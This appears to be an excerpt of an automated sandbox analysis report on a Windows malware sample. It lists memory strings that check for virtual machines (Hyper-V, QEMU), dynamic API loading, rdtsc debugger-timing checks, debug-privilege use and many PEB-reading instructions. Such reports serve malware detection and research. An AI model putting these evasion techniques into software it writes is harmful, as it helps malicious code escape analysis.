Source: aSsc9zh1ex.exe, 00000001.00000002.41965265479.0000000004A89000.00000004.00000800.00020000.00000000.sdmp, aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: aSsc9zh1ex.exe, 00000007.00000002.42243443613.00000000033E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: aSsc9zh1ex.exe, 00000001.00000002.41964793093.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 1_2_6F001BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_6F001BFF
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77FD40 rdtsc 7_2_1D77FD40
Enables debug privileges
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BD71 mov eax, dword ptr fs:[00000030h] 7_2_1D77BD71
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BD71 mov eax, dword ptr fs:[00000030h] 7_2_1D77BD71
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D755D60 mov eax, dword ptr fs:[00000030h] 7_2_1D755D60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C5D60 mov eax, dword ptr fs:[00000030h] 7_2_1D7C5D60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C1D5E mov eax, dword ptr fs:[00000030h] 7_2_1D7C1D5E
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D741D50 mov eax, dword ptr fs:[00000030h] 7_2_1D741D50
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D741D50 mov eax, dword ptr fs:[00000030h] 7_2_1D741D50
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D739D46 mov eax, dword ptr fs:[00000030h] 7_2_1D739D46
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D739D46 mov eax, dword ptr fs:[00000030h] 7_2_1D739D46
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D739D46 mov ecx, dword ptr fs:[00000030h] 7_2_1D739D46
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75DD4D mov eax, dword ptr fs:[00000030h] 7_2_1D75DD4D
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75DD4D mov eax, dword ptr fs:[00000030h] 7_2_1D75DD4D
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75DD4D mov eax, dword ptr fs:[00000030h] 7_2_1D75DD4D
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73FD20 mov eax, dword ptr fs:[00000030h] 7_2_1D73FD20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FBD08 mov eax, dword ptr fs:[00000030h] 7_2_1D7FBD08
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FBD08 mov eax, dword ptr fs:[00000030h] 7_2_1D7FBD08
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7EFDF4 mov eax, dword ptr fs:[00000030h] 7_2_1D7EFDF4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h] 7_2_1D74BDE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h] 7_2_1D74BDE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h] 7_2_1D74BDE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h] 7_2_1D74BDE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h] 7_2_1D74BDE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h] 7_2_1D74BDE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h] 7_2_1D74BDE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74BDE0 mov eax, dword ptr fs:[00000030h] 7_2_1D74BDE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76FDE0 mov eax, dword ptr fs:[00000030h] 7_2_1D76FDE0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D747DB6 mov eax, dword ptr fs:[00000030h] 7_2_1D747DB6
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73DDB0 mov eax, dword ptr fs:[00000030h] 7_2_1D73DDB0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D805D43 mov eax, dword ptr fs:[00000030h] 7_2_1D805D43
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D805D43 mov eax, dword ptr fs:[00000030h] 7_2_1D805D43
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D815D65 mov eax, dword ptr fs:[00000030h] 7_2_1D815D65
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov ecx, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C60 mov eax, dword ptr fs:[00000030h] 7_2_1D753C60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BC6E mov eax, dword ptr fs:[00000030h] 7_2_1D77BC6E
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BC6E mov eax, dword ptr fs:[00000030h] 7_2_1D77BC6E
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C3C57 mov eax, dword ptr fs:[00000030h] 7_2_1D7C3C57
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73DC40 mov eax, dword ptr fs:[00000030h] 7_2_1D73DC40
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C40 mov eax, dword ptr fs:[00000030h] 7_2_1D753C40
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D7C38 mov eax, dword ptr fs:[00000030h] 7_2_1D7D7C38
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D753C20 mov eax, dword ptr fs:[00000030h] 7_2_1D753C20
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737CF1 mov eax, dword ptr fs:[00000030h] 7_2_1D737CF1
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743CF0 mov eax, dword ptr fs:[00000030h] 7_2_1D743CF0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743CF0 mov eax, dword ptr fs:[00000030h] 7_2_1D743CF0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D7CE8 mov eax, dword ptr fs:[00000030h] 7_2_1D7D7CE8
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75DCD1 mov eax, dword ptr fs:[00000030h] 7_2_1D75DCD1
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75DCD1 mov eax, dword ptr fs:[00000030h] 7_2_1D75DCD1
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75DCD1 mov eax, dword ptr fs:[00000030h] 7_2_1D75DCD1
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D3CD4 mov eax, dword ptr fs:[00000030h] 7_2_1D7D3CD4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D3CD4 mov eax, dword ptr fs:[00000030h] 7_2_1D7D3CD4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D3CD4 mov ecx, dword ptr fs:[00000030h] 7_2_1D7D3CD4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D3CD4 mov eax, dword ptr fs:[00000030h] 7_2_1D7D3CD4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D3CD4 mov eax, dword ptr fs:[00000030h] 7_2_1D7D3CD4
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C5CD0 mov eax, dword ptr fs:[00000030h] 7_2_1D7C5CD0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D779CCF mov eax, dword ptr fs:[00000030h] 7_2_1D779CCF
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D805C38 mov eax, dword ptr fs:[00000030h] 7_2_1D805C38
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D805C38 mov ecx, dword ptr fs:[00000030h] 7_2_1D805C38
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74FCC9 mov eax, dword ptr fs:[00000030h] 7_2_1D74FCC9
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D747C95 mov eax, dword ptr fs:[00000030h] 7_2_1D747C95
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D747C95 mov eax, dword ptr fs:[00000030h] 7_2_1D747C95
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E9C98 mov ecx, dword ptr fs:[00000030h] 7_2_1D7E9C98
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E9C98 mov eax, dword ptr fs:[00000030h] 7_2_1D7E9C98
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E9C98 mov eax, dword ptr fs:[00000030h] 7_2_1D7E9C98
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E9C98 mov eax, dword ptr fs:[00000030h] 7_2_1D7E9C98
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FFC95 mov eax, dword ptr fs:[00000030h] 7_2_1D7FFC95
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737C85 mov eax, dword ptr fs:[00000030h] 7_2_1D737C85
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737C85 mov eax, dword ptr fs:[00000030h] 7_2_1D737C85
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737C85 mov eax, dword ptr fs:[00000030h] 7_2_1D737C85
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737C85 mov eax, dword ptr fs:[00000030h] 7_2_1D737C85
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D737C85 mov eax, dword ptr fs:[00000030h] 7_2_1D737C85
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C3C80 mov ecx, dword ptr fs:[00000030h] 7_2_1D7C3C80
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73BF70 mov eax, dword ptr fs:[00000030h] 7_2_1D73BF70
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D741F70 mov eax, dword ptr fs:[00000030h] 7_2_1D741F70
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FBF4D mov eax, dword ptr fs:[00000030h] 7_2_1D7FBF4D
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75DF36 mov eax, dword ptr fs:[00000030h] 7_2_1D75DF36
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75DF36 mov eax, dword ptr fs:[00000030h] 7_2_1D75DF36
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75DF36 mov eax, dword ptr fs:[00000030h] 7_2_1D75DF36
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D75DF36 mov eax, dword ptr fs:[00000030h] 7_2_1D75DF36
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73FF30 mov edi, dword ptr fs:[00000030h] 7_2_1D73FF30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFF03 mov eax, dword ptr fs:[00000030h] 7_2_1D7BFF03
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFF03 mov eax, dword ptr fs:[00000030h] 7_2_1D7BFF03
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFF03 mov eax, dword ptr fs:[00000030h] 7_2_1D7BFF03
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BF0C mov eax, dword ptr fs:[00000030h] 7_2_1D77BF0C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BF0C mov eax, dword ptr fs:[00000030h] 7_2_1D77BF0C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BF0C mov eax, dword ptr fs:[00000030h] 7_2_1D77BF0C
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D739FD0 mov eax, dword ptr fs:[00000030h] 7_2_1D739FD0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFFDC mov eax, dword ptr fs:[00000030h] 7_2_1D7BFFDC
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFFDC mov eax, dword ptr fs:[00000030h] 7_2_1D7BFFDC
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFFDC mov eax, dword ptr fs:[00000030h] 7_2_1D7BFFDC
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFFDC mov ecx, dword ptr fs:[00000030h] 7_2_1D7BFFDC
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFFDC mov eax, dword ptr fs:[00000030h] 7_2_1D7BFFDC
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFFDC mov eax, dword ptr fs:[00000030h] 7_2_1D7BFFDC
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73BFC0 mov eax, dword ptr fs:[00000030h] 7_2_1D73BFC0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D741FAA mov eax, dword ptr fs:[00000030h] 7_2_1D741FAA
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76BF93 mov eax, dword ptr fs:[00000030h] 7_2_1D76BF93
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D741E70 mov eax, dword ptr fs:[00000030h] 7_2_1D741E70
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D777E71 mov eax, dword ptr fs:[00000030h] 7_2_1D777E71
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73BE60 mov eax, dword ptr fs:[00000030h] 7_2_1D73BE60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73BE60 mov eax, dword ptr fs:[00000030h] 7_2_1D73BE60
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BDE50 mov eax, dword ptr fs:[00000030h] 7_2_1D7BDE50
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BDE50 mov eax, dword ptr fs:[00000030h] 7_2_1D7BDE50
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BDE50 mov ecx, dword ptr fs:[00000030h] 7_2_1D7BDE50
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BDE50 mov eax, dword ptr fs:[00000030h] 7_2_1D7BDE50
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BDE50 mov eax, dword ptr fs:[00000030h] 7_2_1D7BDE50
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73FE40 mov eax, dword ptr fs:[00000030h] 7_2_1D73FE40
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73DE45 mov eax, dword ptr fs:[00000030h] 7_2_1D73DE45
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73DE45 mov ecx, dword ptr fs:[00000030h] 7_2_1D73DE45
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D5E30 mov eax, dword ptr fs:[00000030h] 7_2_1D7D5E30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D5E30 mov ecx, dword ptr fs:[00000030h] 7_2_1D7D5E30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D5E30 mov eax, dword ptr fs:[00000030h] 7_2_1D7D5E30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D5E30 mov eax, dword ptr fs:[00000030h] 7_2_1D7D5E30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D5E30 mov eax, dword ptr fs:[00000030h] 7_2_1D7D5E30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7D5E30 mov eax, dword ptr fs:[00000030h] 7_2_1D7D5E30
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D809ED2 mov eax, dword ptr fs:[00000030h] 7_2_1D809ED2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743E14 mov eax, dword ptr fs:[00000030h] 7_2_1D743E14
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743E14 mov eax, dword ptr fs:[00000030h] 7_2_1D743E14
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743E14 mov eax, dword ptr fs:[00000030h] 7_2_1D743E14
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFE1F mov eax, dword ptr fs:[00000030h] 7_2_1D7BFE1F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFE1F mov eax, dword ptr fs:[00000030h] 7_2_1D7BFE1F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFE1F mov eax, dword ptr fs:[00000030h] 7_2_1D7BFE1F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7BFE1F mov eax, dword ptr fs:[00000030h] 7_2_1D7BFE1F
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D73BE18 mov ecx, dword ptr fs:[00000030h] 7_2_1D73BE18
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743E01 mov eax, dword ptr fs:[00000030h] 7_2_1D743E01
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7E3EFC mov eax, dword ptr fs:[00000030h] 7_2_1D7E3EFC
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D743EE2 mov eax, dword ptr fs:[00000030h] 7_2_1D743EE2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D771EED mov eax, dword ptr fs:[00000030h] 7_2_1D771EED
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D771EED mov eax, dword ptr fs:[00000030h] 7_2_1D771EED
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D771EED mov eax, dword ptr fs:[00000030h] 7_2_1D771EED
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D781ED8 mov eax, dword ptr fs:[00000030h] 7_2_1D781ED8
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D77BED0 mov eax, dword ptr fs:[00000030h] 7_2_1D77BED0
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C7EC3 mov eax, dword ptr fs:[00000030h] 7_2_1D7C7EC3
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C7EC3 mov ecx, dword ptr fs:[00000030h] 7_2_1D7C7EC3
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov eax, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov eax, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov eax, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov ecx, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D751EB2 mov eax, dword ptr fs:[00000030h] 7_2_1D751EB2
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76BE80 mov eax, dword ptr fs:[00000030h] 7_2_1D76BE80
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B950 mov eax, dword ptr fs:[00000030h] 7_2_1D74B950
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B950 mov ecx, dword ptr fs:[00000030h] 7_2_1D74B950
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B950 mov eax, dword ptr fs:[00000030h] 7_2_1D74B950
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B950 mov eax, dword ptr fs:[00000030h] 7_2_1D74B950
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B950 mov eax, dword ptr fs:[00000030h] 7_2_1D74B950
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D74B950 mov eax, dword ptr fs:[00000030h] 7_2_1D74B950
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C395B mov eax, dword ptr fs:[00000030h] 7_2_1D7C395B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C395B mov eax, dword ptr fs:[00000030h] 7_2_1D7C395B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7C395B mov eax, dword ptr fs:[00000030h] 7_2_1D7C395B
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D940 mov eax, dword ptr fs:[00000030h] 7_2_1D76D940
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D76D940 mov eax, dword ptr fs:[00000030h] 7_2_1D76D940
Source: C:\Users\user\Desktop\aSsc9zh1ex.exe Code function: 7_2_1D7FD947 mov eax, dword ptr fs:[00000030h] 7_2_1D7FD947
